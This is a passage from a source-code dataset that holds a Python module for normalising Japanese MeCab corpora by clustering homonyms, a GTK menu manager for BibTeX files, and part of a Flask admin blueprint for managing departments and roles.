ToWrite=LiNe\n \n Out.write(ToWrite)\n \n FSr.close()\n if OutFP:\n Out.close()\n os.rename(TmpOutFP,OutFP)\n\ndef get_clustered_homs(LexFPs,*Args,**KWArgs):\n ClusteredH=[]\n for LexFP in LexFPs:\n if Debug:\n sys.stderr.write('\\n\\nfinding homonym clusters with the lexicon '+LexFP+'\\n\\n')\n ClusteredH.extend(get_clustered_homs_file(LexFP,*Args,**KWArgs))\n return ClusteredH\n \ndef get_clustered_homs_file(LexFP,RelvFts,Frequents=set(),ProbExemplars={},OutFP=None):\n RelvInds=mecabtools.fts2inds(RelvFts,CorpusOrDic='dic')\n if Debug:\n print('doing the raw clustering')\n FtLines={ Ft:Lines for (Ft,Lines) in mecabtools.cluster_samefeat_lines(LexFP,RelvInds).items() if len(Lines)>=2 and Ft[-1]!='*' }\n\n ClusteredHs=[]\n MSs,Consts=None,myModule.prepare_progressconsts(FtLines)\n for Cntr,(FtSet,Lines) in enumerate(FtLines.items()):\n if Debug and Cntr+1%100==0:\n MSs=myModule.prepare_progressconsts(MSs,Cntr,Consts)\n MWds=[ mecabtools.mecabline2mecabwd(Line,CorpusOrDic='dic') for Line in Lines ]\n if Frequents and not any(MWd.orth in Frequents for MWd in MWds):\n continue\n FtSetLabeled=list(zip(RelvFts,FtSet))\n myCHs=ClusteredHomonyms(MWds,FtSetLabeled)\n myCHs.set_exemplar(ProbExemplars)\n ClusteredHs.append(myCHs)\n return ClusteredHs\n\n \ndef collect_freq_wds(FreqWdFP,RankUpTo,HiraganaOnly=False):\n Wds=set()\n with open(FreqWdFP) as FSr:\n for Cntr,LiNe in enumerate(FSr):\n if Cntr==RankUpTo-1:\n break\n Wd=LiNe.strip().strip().split()[-1]\n if HiraganaOnly:\n if myModule.all_of_chartypes_p(Wd,['hiragana']):\n Wds.add(Wd)\n else: \n Wds.add(Wd)\n return Wds\n \n \nclass ClusteredHomonyms:\n def __init__(self,MecabWds,ClusterOn):\n if self.homonymity_check(MecabWds):\n self.cluster_on=tuple(ClusterOn)\n self.hiragana_rendering=jp_morph.kana2kana(self.cluster_on[-1][1])\n self.cluster_str=','.join([Val for (_,Val) in ClusterOn ])\n 
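# split the homonyms into one all-kana cluster and one or more kanji clusters;\n        # words whose kanji characters nest within each other share a cluster\n        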
(KanaC,KanjiCs)=self.cluster_homonyms(MecabWds)\n self.kana_cluster=KanaC\n self.kana_lemma='unknown' if not self.kana_cluster else self.kana_cluster[0].lemma\n self.kanji_clusters=KanjiCs\n self.kanji_tops=[KanjiC[0] for KanjiC in self.kanji_clusters]\n #self.interkanji_dist=InterkanjiDist\n ReprType,ReprWds=self.pick_representative()\n self.represent_wds=ReprWds\n self.represent_type=ReprType\n # exemplar is dynamically set with set_exemplar\n self.exemplar=None\n\n def special_kana_exemplar_p(self):\n # いる なる やる ある only for now\n Specials={'いる':{'infpat':'一段'},'なる':{'cat':'動詞'},'やる':{'cat':'動詞'},'ある':{'cat':'動詞'}}\n Bool=False\n if self.kana_lemma in Specials.keys():\n FtValPairs=Specials[self.kana_lemma]\n if all(self.represent_wds[0].__dict__[Ft]==Val for (Ft,Val) in FtValPairs.items()):\n Bool=True\n \n return Bool\n \n def set_exemplar(self,ProbExemplars):\n Normalisable=False;Exemplar=None\n if self.special_kana_exemplar_p():\n # special exceptions where you don't convert to kanji\n Exemplar=self.kana_cluster[0]\n elif not self.kanji_clusters:\n # kana only case\n Normalisable=True\n Exemplar=self.kana_cluster[0]\n elif len(self.kanji_clusters)==1:\n # nonambiguous kanji case\n Normalisable=True\n Exemplar=self.represent_wds[0]\n elif self.kana_lemma in ProbExemplars.keys():\n ExemplarWds= [Wd for Wd in myModule.flatten_list(self.kanji_clusters) if Wd.lemma in ProbExemplars.values()]\n if ExemplarWds:\n Normalisable=True\n Exemplar=ExemplarWds[0]\n \n self.exemplar=Exemplar\n return Normalisable\n \n def pick_representative(self,Criterion='rate'):\n if not (self.kana_cluster or self.kanji_clusters):\n sys.exit('something is wrong, no cluster content')\n else:\n# # this means only kanji clusteres are populated\n # if not self.kana_cluster:\n # return ('kanji',self.kanji_clusters[0][0])\n # #and this, only kana cluster exists\n # elif not self.kanji_clusters:\n # return ('kana',self.kana_cluster[0])\n # # the following two are when both exist, and then, it depens on the count\n # else:\n if Criterion=='count':\n if self.kana_cluster[0].count*0.6>self.kanji_clusters[0][0].count:\n return 'kana',self.kana_cluster[0]\n else:\n return 'kanji',self.kanji_clusters[0][0]\n else:\n if not self.kanji_clusters:\n return 'kana',[jp_morph.pick_highest_charrate(self.kana_cluster,['hiragana'])[0]]\n else:\n return 'kanji',[jp_morph.pick_highest_charrate(Cluster,['han'])[0] for Cluster in self.kanji_clusters]\n\n def homonymity_check(self,MecabWds):\n Bool=True; PrvPron=None\n for MecabWd in MecabWds:\n if PrvPron:\n if MecabWd.pronunciation!=PrvPron:\n Bool=False\n break\n PrvPron=MecabWd.pronunciation\n return Bool\n \n def cluster_homonyms(self,MecabWds,SortP=False):\n KanaCluster=[ Hom for Hom in MecabWds if myModule.all_of_chartypes_p(Hom.orth,['hiragana','katakana','roman']) ]\n if SortP:\n KanaCluster=sorted(KanaCluster,key=lambda x:x.count,reverse=True)\n\n KanjiClusters=[]\n for Cntr,Hom in enumerate(set(MecabWds)-set(KanaCluster)):\n if Cntr==0:\n KanjiClusters.append([Hom])\n else:\n for Cluster in KanjiClusters:\n if homonympair_identical_p(Cluster[-1],Hom):\n Cluster.append(Hom)\n break\n else:\n KanjiClusters.append([Hom])\n\n if SortP:\n # sorting, inside a kanji cluster\n KanjiClusters=[ sorted(Cluster,key=lambda x:x.count,reverse=True) for Cluster in KanjiClusters ]\n # sorting, between clusters\n if len(KanjiClusters)>=2:\n KanjiClusters=sorted( KanjiClusters, key=lambda x:x[0].count, reverse=True )\n# InterClusterDist=probability.DiscDist({ KanjiCluster[0]:KanjiCluster[0].count 
for KanjiCluster in KanjiClusters },Smooth=True)\n \n return KanaCluster,KanjiClusters\n #,InterClusterDist\n\n def order_clusters(self):\n if not self.kanji_clusters:\n OrderedReprs=[self.order_by_countscore(self.kana_cluster)]\n else:\n OrderedReprs=[]\n for KanjiC in self.kanji_clusters:\n OrderedReprs.append(self.order_by_countscore(self.kana_cluster.union(KanjiC)))\n self.ordered_clusters=sorted(OrderedReprs,key=lambda x: x[0].count, reverse=True)\n \n def order_by_countscore(self,OrgWds,RareKanjiScale=4):\n ApplyRKS=False\n Wds=copy.copy(OrgWds)\n RareKanjis= [Wd for Wd in Wds if Wd.count<5 and any(myModule.identify_chartype(Char)=='han' for Char in Wd.orth)]\n if RareKanjis:\n ApplyRKS=True\n WdsScores=[]\n for Wd in Wds:\n if ApplyRKS:\n if Wd in RareKanjis:\n WdsScores.append((Wd,(Wd.count+1)*RareKanjiScale))\n elif myModule.all_of_chartypes_p(Wd.orth,['hiragana','katakana']):\n WdsScores.append((Wd,Wd.count//RareKanjiScale))\n else:\n WdsScores.append((Wd,Wd.count))\n else:\n WdsScores.append((Wd,Wd.count))\n return [ Wd for (Wd,Score) in sorted(WdsScores,key=lambda x:x[1],reverse=True) ]\n\n def show_summary(self):\n get_wdcntstrs=lambda Cl: [ Wd.orth+' '+str(Wd.count) for Wd in Cl]\n Lines=[]\n Lines.append(self.hiragana_rendering)\n Lines.append(repr(self.cluster_on))\n Lines.append(repr([Wd.orth for Wd in self.represent_wds]))\n ExemplarStr='Exempar: '\n if self.exemplar:\n ExemplarStr+=self.exemplar.orth\n else:\n ExemplarStr+=' NONE'\n Lines.append(ExemplarStr)\n Lines.append('kana cluster: '+' '.join(get_wdcntstrs(self.kana_cluster)))\n KanjiClustersStr=''\n if self.kanji_clusters:\n for Cl in self.kanji_clusters:\n KanjiClustersStr+=' '.join(get_wdcntstrs(Cl))+' / '\n Lines.append('kanji clusters: '+KanjiClustersStr)\n #LineElsIKD=[]\n# if len(self.kanji_clusters)>=2:\n # for (Evt,Prob) in self.interkanji_dist.evtprob.items():\n # LineElsIKD.append(Evt.orth+str(Prob))\n #Lines.append('kanji-conversion ratio '+' '.join(LineElsIKD))\n return '\\n'.join(Lines)\n\ndef output_model_text(Homs,Out):\n FSw=open(Out,'wt')\n for Hom in Homs:\n try:\n ClusterStr=Hom.show_summary()\n except:\n Hom.show_summary()\n FSw.write(ClusterStr+'\\n\\n')\n \n FSw.close()\n\n\ndef main00(CorpusFPs,LexFP,FtNums,AdditionalLexs=[],OutputModelText=None, CorpusOnly=False,UsePrevClusteredHoms=None,Debug=0):\n \n if UsePrevClusteredHoms:\n PickleFP=UsePrevClusteredHoms\n else:\n PickleFP='_'.join(CorpusFPs)+'_'+os.path.basename(LexFP)+'.clusteredhoms.pickle'\n (ClusteredHoms,_)=myModule.ask_filenoexist_execute_pickle(PickleFP,create_clustered_homonyms,([CorpusFPs,LexFP,FtNums],{}))\n if OutputModelText:\n OutFP=PickleFP.replace('.pickle','.txt')\n output_model_text(ClusteredHoms,OutFP)\n \n print('\\nextracting items to normalise...')\n WdsRepls=extract_wds2normalise(ClusteredHoms)\n\n print('\\nnormalising corpora...')\n normalise_mecab(CorpusFPs,WdsRepls,'corpus',Debug=Debug)\n\n if not CorpusOnly:\n print('\\nnormalising main lexicon...')\n normalise_mecab([LexFP],WdsRepls,'lex')\n if AdditionalLexs:\n print('\\nnormalising other lexicons...')\n normalise_mecab(AdditionalLexs,WdsRepls,'simplelex')\n\n \ndef create_clustered_homonyms(CorpusFPs,LexFP,FtNums):\n print('\\nfirst we do the raw counts')\n ClusteredWds=count_variants(CorpusFPs)\n print('\\nnow we collect non-ocurring items from the lexicon')\n ClusteredWds=augment_withnulloccs(ClusteredWds,FtNums,LexFP)\n print('\\nnow we cluster homonyms')\n ClusteredHoms=normalise_clustered_wds(ClusteredWds)\n return ClusteredHoms\n\ndef 
normalise_mecab(Files, WdsRepls, LorC='corpus',Debug=0):\n for File in Files:\n print('normalising '+File)\n normalise_mecab_file(File,WdsRepls,LorC,Debug=Debug)\n\ndef normalise_mecab_file(InputFP,WdsRepls,LexOrCorpus,OutputDiff=True,Debug=0):\n\n def return_match_ifany(Line,LinesRepls,LexOrCorpus,Regex):\n if LexOrCorpus=='lex':\n LineForm=re.sub(Regex,'\\t',Line)\n elif LexOrCorpus=='simplelex':\n LineForm=Line.split('\\t')[0]\n else:\n LineForm=Line\n if LineForm in LinesRepls.keys():\n ToReturn=LinesRepls[LineForm]\n else:\n ToReturn=None\n return ToReturn\n\n LinesRepls={ Wd.get_mecabline():Repl for (Wd,Repl) in WdsRepls.items() }\n\n FSr=open(InputFP)\n FSw=open(InputFP+'.normed','wt')\n\n Regex=re.compile(r',([0-9]+,){3}')\n if Debug:\n TgtLines=set([Line for Line in LinesRepls.keys()])\n SrcLinesUpTo100k=set();AllP=False\n for i in range(100000):\n Next=FSr.readline()\n if not Next:\n AllP=True\n break\n else:\n SrcLinesUpTo100k.add(Next.strip())\n if LexOrCorpus=='lex':\n SrcLinesUpTo100k={re.sub(Regex,'\\t',Line) for Line in SrcLinesUpTo100k}\n Intersect=TgtLines.intersection(SrcLinesUpTo100k)\n \n FSr.seek(0)\n\n if not Intersect:\n if AllP:\n print('there is no match, no point processing')\n else:\n print('there is no match for the first 100k, probable that there is none')\n if OutputDiff:\n FSwDiff=open(InputFP+'.diff','wt')\n show_linediff=lambda LiNe1,LiNe2: LiNe1.strip()+'\\n'+LiNe2.strip()\n for Cntr,LiNe in enumerate(FSr):\n Alt=return_match_ifany(LiNe.strip(),LinesRepls,LexOrCorpus,Regex)\n if Alt:\n AmbP=False\n if LexOrCorpus=='corpus':\n if isinstance(Alt,mecabtools.MecabWdParse):\n Picked=Alt\n else:\n Picked=probability.rand_biased(Alt)\n AmbP=True\n NewLiNe=Picked.get_mecabline()+'\\n'\n\n if OutputDiff:\n if AmbP:\n FSwDiff.write('ambiguous case, competitors are: ')\n FSwDiff.write(repr([(Wd.orth,Prob) for (Wd,Prob) in Alt.evtprob.items()])+'\\n')\n FSwDiff.write(show_linediff(LiNe,NewLiNe)+'\\n\\n')\n\n FSw.write(NewLiNe)\n else:\n print('found')\n pass\n else:\n FSw.write(LiNe)\n if OutputDiff:\n FSwDiff.close()\n FSr.close();FSw.close()\n\n\ndef extract_wds2normalise(HomCs,Debug=0):\n Wds2Normalise={}\n for HomC in HomCs:\n # if the representative is all-kana, we render everything that representative\n if HomC.represent_type=='kana':\n # that means the targets are everything except the representative itself\n Wds2Change2Kana=HomC.kana_cluster[1:]+myModule.flatten_list(HomC.kanji_clusters)\n for Wd2Change2Kana in Wds2Change2Kana:\n Wds2Normalise[Wd2Change2Kana]=HomC.represent_wd\n # on the other hand if it includes kanji, we keep the top ranked element in each cluster\n elif HomC.represent_type=='kanji':\n for KanaWd in HomC.kana_cluster:\n IKD=HomC.interkanji_dist\n KanjiWd=(list(IKD.evtprob.keys())[0] if IKD.evtcount==1 else IKD)\n Wds2Normalise[KanaWd]=KanjiWd\n for KanjiC in HomC.kanji_clusters:\n for NonTopKanjiWd in KanjiC[1:]:\n Wds2Normalise[NonTopKanjiWd]=KanjiC[0]\n return Wds2Normalise\n\n\ndef pick_corefts(Fts):\n return tuple([(NumsFts[Num],Fts[Num]) for Num in CoreFtNums])\n \n\ndef count_variants(MecabCorpusFPs):\n CumCoreFtsCnts={}\n for FP in MecabCorpusFPs:\n CoreFtsCntsPerCorpus=mecabtools.count_words(FP)\n CumCoreFtsCnts=myModule.merge_countdics(CumCoreFtsCnts,CoreFtsCntsPerCorpus)\n \n ClusteredWdsCnts=wdscnts2clusteredcnts(CumCoreFtsCnts)\n return ClusteredWdsCnts\n\ndef wdscnts2clusteredcnts(WdsCnts):\n Clustered={}\n\n for (Wd,Fts),Cnt in WdsCnts.items():\n \n FtsDic={'orth':Wd}\n for Num in range(9):\n FtsDic[NumsFts[Num]]=Fts[Num]\n # 
here you make an wd obj\n MWd=mecabtools.MecabWdParse(**FtsDic)\n MWd.set_count(Cnt)\n RelvFts=pick_corefts(Fts)\n #tuple([ (NumsFts[Num],Fts[Num]) for Num in ClusterOn ])\n \n if RelvFts not in Clustered.keys():\n Clustered[RelvFts]={MWd}\n else:\n Clustered[RelvFts].add(MWd)\n ClusteredMoreThan1={ Header:Wds for Header,Wds in Clustered.items() if len(Wds)>=2 }\n return ClusteredMoreThan1\n\n\ndef wdcnt2wdfts(CoreFts,WdsCnts):\n WdFts=[]\n for (Wd,OtherFts) in WdsCnts:\n WdFts.append((Wd,CoreFts[:-1]+OtherFts+CoreFts[-1:]))\n return WdFts\n\ndef augment_withnulloccs(ClusteredWds,FtNums,LexFP):\n for Cntr,LexLiNe in enumerate(open(LexFP)):\n if not mecabtools.not_proper_jp_p(LexLiNe):\n WdFtPairInLex=mecabtools.line2wdfts(LexLiNe,'dic')\n Orth,FtsLex=WdFtPairInLex\n if len(FtsLex)!=9:\n sys.stderr.write('something wrong with Line: '+str(Cntr+1)+' '+LexLiNe)\n continue\n Fts={}\n Fts['orth']=Orth\n Fts.update([ (NumsFts[Cntr],Val) for (Cntr,Val) in enumerate(FtsLex) ])\n WdInLex=mecabtools.MecabWdParse(**Fts)\n WdInLex.lexpos=Cntr+1\n CoreFtsLexLine=tuple([(NumsFts[Column-1],FtsLex[Column-1]) for Column in FtNums])\n # check if the dic entry is in the cluster set\n if CoreFtsLexLine in ClusteredWds.keys():\n # if it is, check the whole entry exists in it by checking noncore features match\n Cluster=ClusteredWds[CoreFtsLexLine]\n Fnd=False\n for WdInCorpus in Cluster:\n if all(WdInCorpus.__dict__[NonCoreFt] == WdInLex.__dict__[NonCoreFt] for NonCoreFt in NonCoreFts):\n Fnd=True\n WdInCorpus.lexpos=Cntr+1\n break\n if not Fnd:\n WdInLex.count=0\n ClusteredWds[CoreFtsLexLine].add(WdInLex)\n \n return ClusteredWds\n\ndef sift_list_relv_irrelv(List,Conditions=[],CntrConditions=[]):\n Relvs = []; Irrelvs = []\n for Cntr,El in enumerate(List):\n if all(Condition(El) for Condition in Conditions) and all(CntrCondition(Cntr) for CntrCondition in CntrConditions):\n Relvs.append(El)\n else:\n Irrelvs.append(El)\n return tuple(Relvs),tuple(Irrelvs)\n \n\ndef normalise_clustered_wds(ClusteredWds,Exclude=(),Debug=0):\n FtsReprs=[]\n for CoreFts,Cluster in ClusteredWds.items():\n Cluster=list(Cluster)\n if len(Cluster)==1:\n\n sys.stderr.write('no ambiguity\\n')\n# sys.stdout.write(Lines[0]+'\\n')\n else:\n if Debug:\n sys.stderr.write('\\ncandidates')\n sys.stderr.write('\\n'+repr([Wd.orth for Wd in Cluster])+'\\n')\n\n MyHoms=ClusteredHomonyms(Cluster,CoreFts)\n if Debug:\n print(MyHoms.show_summary())\n FtsReprs.append(MyHoms)\n \n return FtsReprs\n\n\ndef reduce_infwds(LexemeClusters,Debug=0):\n #WdFts should be a pair, word and features\n NewLexCs=OrderedDict()\n for LexemeFts,Lines in LexemeClusters.items():\n if LexemeFts[0] in ('動詞','形容詞'):\n ReprLineEls=reduce_infwd(LexemeFts,Lines)\n NewLexCs[LexemeFts]=[','.join(ReprLineEls)]\n else:\n NewLexCs[LexemeFts]=Lines\n return NewLexCs\n\ndef reduce_infwd(LexemeFts,Lines):\n def change_last_char(Str):\n if Str[-1]=='う':\n return Str[:-1]+'w'\n elif Str[-1]=='え':\n return Str[:-1]\n else:\n return Str[:-1]+romkan.to_hepburn(Str[-1])[0]\n\n (PoS,SubCat,_,_,InfType,InfCat)=LexemeFts\n\n ReprLineEls=next(Line for Line in Lines if Line.split(',')[9]=='基本形').split(',')\n DanGyo=InfType.split('・')\n if DanGyo[0]=='五段':\n ReprLineEls=[ change_last_char(ReprLineEl) if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n \n elif DanGyo[0]=='一段' or PoS=='形容詞':\n ReprLineEls=[ ReprLineEl[:-1] if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n\n return ReprLineEls\n\n\ndef 
choose_from_homonyms(Homs): \n return Homs.pop(),Homs\n\n#### CORE STUFF #####\ndef homonympair_identical_p(Homonym1,Homonym2):\n # trivial case\n if Homonym1.orth==Homonym2.orth:\n Bool=True\n else:\n # default is true\n Bool=True\n # but don't accept kanji-only pairs as synonyms\n if all(myModule.all_of_chartypes_p(Homonym.orth,['han']) for Homonym in (Homonym1,Homonym2)):\n Bool=False\n # otherwise, we take all the kanjis from each and if one does not contain another, we say they're not synonyms\n Kanjis1={ Char for Char in Homonym1.orth if myModule.identify_type_char(Char)=='han'}\n Kanjis2={ Char for Char in Homonym2.orth if myModule.identify_type_char(Char)=='han'}\n if not (Kanjis1.issubset(Kanjis2) or Kanjis2.issubset(Kanjis1)):\n Bool=False\n #otherwise it's a synonym\n else:\n Bool=True\n \n return Bool\n\n\n\ndef cluster_possibly_ambiguous_p(Cluster):\n KanaTypes=['hiragana','katakana','roman']\n KanjiContained=[Wd for Wd in Cluster if not myModule.all_of_chartypes_p(Wd.orth,KanaTypes)]\n if Debug:\n print([Wd.orth for Wd in Cluster])\n #if theres no kanji, they're just the same\n if not KanjiContained:\n Bool= False\n else:\n Bool=any(not homonympair_identical_p(Wd1,Wd2) for (Wd1,Wd2) in itertools.combinations(Cluster,2))\n\n if Debug:\n DebugStr=('ambiguous' if Bool else 'unambiguous')\n print(DebugStr+'\\n')\n \n return Bool\n\n\n \ndef main():\n import argparse,glob\n\n APsr=argparse.ArgumentParser()\n APsr.add_argument('-l','--lexicon-dir',required=True)\n APsr.add_argument('mecab_corpus_dir')\n APsr.add_argument('--debug',type=int,default=0)\n APsr.add_argument('--previous-clusteredhoms',default=None)\n APsr.add_argument('--additional-lexs',nargs='+',default=[])\n #APsr.add_argument('--corpus-only',action='store_true')\n APsr.add_argument('--unnormalisable-unmark',action='store_true')\n APsr.add_argument('--output-text',action='store_true')\n APsr.add_argument('-f','--freq-word-fp')\n APsr.add_argument('-e','--exemplar-fp')\n \n Args=APsr.parse_args()\n\n FPSets=[]\n for Dir,Ext in ((Args.lexicon_dir,'csv'),(Args.mecab_corpus_dir,'mecab')):\n if not os.path.isdir(Dir):\n sys.exit('\\n\\nspecified dir does not exist: '+Dir+'\\n')\n else:\n FPs=glob.glob(os.path.join(Dir,'*.'+Ext))\n if not FPs:\n sys.exit('\\n\\nno right file in specified dir: '+Dir+'\\n')\n else:\n FPSets.append(FPs)\n \n # generally, the exemplar file should be in the lex dir, the frequency file in the corpusdir\n AssistFPs=[ (Type,AssistFP) for (Type,AssistFP) in (('freq_word_fp',Args.freq_word_fp),('exemplar_fp',Args.exemplar_fp)) if AssistFP ]\n for Type,AssistFP in AssistFPs:\n if '/' not in AssistFP:\n Dir=Args.mecab_corpus_dir if Type=='freq_word_fp' else Args.lexicon_dir\n FP=os.path.join(Dir,AssistFP)\n if os.path.isfile(FP):\n Args.__dict__[Type]=FP\n else:\n sys.exit('AssistFP '+FP+' does not exist')\n \n main0(FPSets[0],FPSets[1],FreqWdFP=Args.freq_word_fp,ProbExemplarFP=Args.exemplar_fp,UnnormalisableMarkP=not Args.unnormalisable_unmark)\n\n\n\n\nif __name__=='__main__':\n main()\n","sub_path":"normalise_jp_shared/normalise_mecab.py","file_name":"normalise_mecab.py","file_ext":"py","file_size_in_byte":28193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"197608192","text":"import gi\n# import pybib\n# import view\n# import os\nimport io\nfrom gi.repository import Gtk\ngi.require_version(\"Gtk\", \"3.0\")\n\n\nclass MenuManager:\n\n def __init__(self):\n self.parsing = pybib.parser()\n self.TreeView = view.treeview()\n\n def 
file_new_clicked(self, widget):\n        dialog = Gtk.FileChooserDialog(\"Open an existing file\", None,\n                                       Gtk.FileChooserAction.OPEN,\n                                       (Gtk.STOCK_CANCEL,\n                                        Gtk.ResponseType.CANCEL,\n                                        Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n        # self.add_filters(dialog)\n        response = dialog.run()\n        if response == Gtk.ResponseType.OK:\n            self.filename = dialog.get_filename()\n            return(self.filename)\n        elif response == Gtk.ResponseType.CANCEL:\n            print(\"Cancel clicked\")\n\n        dialog.destroy()\n\n    def file_open_clicked(self, SimpleAction, parameter):\n        dialog = Gtk.FileChooserDialog(\"Open an existing file\", None,\n                                       Gtk.FileChooserAction.OPEN,\n                                       (Gtk.STOCK_CANCEL,\n                                        Gtk.ResponseType.CANCEL,\n                                        Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n        filter = Gtk.FileFilter()\n        filter.set_name(\"BiBTex File\")\n        filter.add_pattern(\"*.bib\")\n        dialog.add_filter(filter)\n        filter = Gtk.FileFilter()\n        filter.set_name(\"All Files\")\n        filter.add_pattern(\"*\")\n        dialog.add_filter(filter)\n\n        response = dialog.run()\n        if response == Gtk.ResponseType.OK:\n            filename = dialog.get_filename()\n            dialog.destroy()\n            del self.TreeView.full_list[:]\n            del self.parsing.booklist[:]\n            self.TreeView.bookstore.clear()\n            self.TreeView.indxcount = 0\n            with open(filename, \"r\") as filename:\n                self.parsing.parsing_read(filename)\n            self.TreeView.viewer(self.parsing.booklist)\n        elif response == Gtk.ResponseType.CANCEL:\n            print(\"Cancel clicked\")\n        dialog.destroy()\n\n    def file_save_as_clicked(self, SimpleAction, parameter):\n        dialog = Gtk.FileChooserDialog(\"Save as an existing file\", None,\n                                       Gtk.FileChooserAction.SAVE,\n                                       (Gtk.STOCK_CANCEL,\n                                        Gtk.ResponseType.CANCEL,\n                                        Gtk.STOCK_SAVE, Gtk.ResponseType.OK))\n        filter = Gtk.FileFilter()\n        filter.set_name(\"BiBTex File\")\n        filter.add_pattern(\"*.bib\")\n        dialog.add_filter(filter)\n        filter = Gtk.FileFilter()\n        filter.set_name(\"All Files\")\n        filter.add_pattern(\"*\")\n        dialog.add_filter(filter)\n\n        response = dialog.run()\n        if response == Gtk.ResponseType.OK:\n            filename = dialog.get_filename()\n            print(filename)\n            self.parsing.parsing_write(filename)\n        elif response == Gtk.ResponseType.CANCEL:\n            print(\"Cancel clicked\")\n        dialog.destroy()\n\n    def on_menu_file_quit(self, widget):\n        Gtk.main_quit()\n\n    # def on_menu_others(self, widget):\n    #     print(\"Menu item \" + widget.get_name() + \" was selected\")\n\n    # def on_menu_choices_changed(self, widget, current):\n    #     filename = current.get_name()+\".xml\"\n    #     print(filename + \" will be opened\")\n\n    def create_textview(self, SimpleAction, parameter):\n        self.popup = Gtk.Window()\n        self.popup.set_title(\"Add a complete bibtex entry\")\n        self.popup.set_default_size(350, 350)\n        grid = Gtk.Grid()\n        scrolw = Gtk.ScrolledWindow()\n        scrolw.set_hexpand(True)\n        scrolw.set_vexpand(True)\n        button = Gtk.Button(\"Create\")\n        button.connect(\"clicked\", self.create_from_buffer)\n        tview = Gtk.TextView()\n        tview.set_wrap_mode(Gtk.WrapMode.WORD)\n\n        # Get the buffer\n        self.textbuffer = tview.get_buffer()\n        scrolw.add(tview)\n        grid.attach(scrolw, 0, 0, 10, 10)\n        grid.attach(button, 0, 11, 10, 1)\n        self.popup.add(grid)\n        self.popup.show_all()\n\n    def create_from_buffer(self, widget):\n        start_iter = self.textbuffer.get_start_iter()\n        end_iter = self.textbuffer.get_end_iter()\n        text = io.StringIO(self.textbuffer.get_text(start_iter,\n                                                    end_iter, True))\n        del self.parsing.booklist[:]\n        self.parsing.parsing_read(text)\n        self.TreeView.viewer(self.parsing.booklist)\n        
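# close the popup once the pasted BibTeX entry has been parsed and displayed\n        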
self.popup.destroy()\n","sub_path":"ptbl/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198661524","text":"#app/admin/views\n\nfrom flask import abort, render_template, url_for, redirect, flash\nfrom flask_login import current_user, login_required\n\nfrom . import admin\nfrom .forms import DepartmentForm, RoleForm, EmployeeAssignForm\nfrom .. import db\nfrom ..models import Department, Role, Employee\n\ndef check_admin():\n\n    \"\"\"\n    prevent non-admin users from accessing this page\n\n    \"\"\"\n    if not current_user.is_admin:\n        abort(403)\n\n@admin.route('/departments/list', methods=['GET','POST'])\n@login_required\ndef list_departments():\n    \"\"\"\n    List all departments\n\n    \"\"\"\n\n    check_admin()\n    departments = Department.query.all()\n    return render_template('list_departments.html', departments=departments, title='Departments')\n\n@admin.route('/departments/add', methods=['GET','POST'])\n@login_required\ndef add_department():\n\n    \"\"\"\n    add a department to the database\n\n    \"\"\"\n    check_admin()\n    add_department = True\n\n    form = DepartmentForm()\n    if form.validate_on_submit():\n        department = Department(name=form.name.data, description=form.description.data)\n        try:\n            # add department to the database\n\n            db.session.add(department)\n            db.session.commit()\n            flash('You have successfully added a new department')\n        except:\n            # in case the department name already exists\n            flash('Error: Your new department name already exists')\n        return redirect(url_for('admin.list_departments'))\n    # load the department template\n    return render_template('department.html', action='Add', add_department=add_department, form=form, title='Add Department')\n\n\n@admin.route('/departments/edit/<int:id>', methods=['GET','POST'])\n@login_required\ndef edit_department(id):\n\n    \"\"\"\n    edit a department\n\n    \"\"\"\n    check_admin()\n\n    add_department=False\n    department = Department.query.get_or_404(id)\n    form = DepartmentForm(obj=department)\n    if form.validate_on_submit():\n        department.name=form.name.data\n        department.description = form.description.data\n        db.session.commit()\n        flash('You have successfully edited this department')\n        # return to the department list page\n        return redirect(url_for('admin.list_departments'))\n\n    form.name.data = department.name\n    form.description.data = department.description\n    return render_template('department.html', action='Edit', add_department=add_department, department=department, form=form, title='Edit Department')\n\n\n@admin.route('/departments/delete/<int:id>', methods=['GET','POST'])\n@login_required\ndef delete_department(id):\n    \"\"\"\n    delete a department from the database\n\n    \"\"\"\n\n    check_admin()\n    department = Department.query.get_or_404(id)\n    db.session.delete(department)\n    db.session.commit()\n\n    flash('You have successfully deleted a department')\n\n    return redirect(url_for('admin.list_departments'))\n\n\n@admin.route('/roles/list', methods=['GET', 'POST'])\n@login_required\ndef list_roles():\n    \"\"\"\n    list all roles in the database\n    \"\"\"\n    check_admin()\n    roles = Role.query.all()\n    return render_template('list_roles.html', roles=roles, title='roles')\n\n@admin.route('/roles/add', methods=['GET','POST'])\n@login_required\ndef add_role():\n    \"\"\"\n    add a role into the database\n    \"\"\"\n    check_admin()\n    add_role = True\n    form = RoleForm()\n    if form.validate_on_submit():\n\n        # add the new role to the database if the role name is not 
duplicated\n        try:\n            role = Role(name=form.name.data, description=form.description.data)\n            db.session.add(role)\n            db.session.commit()\n            flash('You have successfully added a new role')\n\n        except:\n            # if a duplicate entry is found\n            flash('Error: role name already exists')\n        #return to the roles list\n        return redirect(url_for('admin.list_roles'))\n    # render the form where the name and description can be filled in\n    return render_template('role.html', add_role=add_role, form=form, title='Add role')\n\n\n@admin.route('/roles/edit/<int:id>', methods=['GET','POST'])\n@login_required\ndef edit_role(id):\n    \"\"\"\n    edit one role\n    \"\"\"\n    check_admin()\n    add_role=False\n    role = Role.query.get_or_404(id)\n    # use obj= (not object=) so WTForms pre-populates the form from the role\n    form = RoleForm(obj=role)\n    if form.validate_on_submit():\n        # update current role\n        role.name = form.name.data\n        role.description = form.description.data\n        db.session.commit()\n        flash('You have successfully updated the role')\n        return redirect(url_for('admin.list_roles'))\n    form.name.data = role.name\n    form.description.data = role.description\n    return render_template('role.html', add_role=add_role, form=form, title='Edit role')\n\n\n@admin.route('/roles/delete/<int:id>', methods=['GET','POST'])\n@login_required\ndef delete_role(id):\n    \"\"\"\n\n    delete a role\n    \"\"\"\n    check_admin()\n    add_role=False\n    role = Role.query.get_or_404(id)\n    db.session.delete(role)\n    db.session.commit()\n    flash('You have successfully deleted a role')\n\n    #redirect to the roles list\n    return 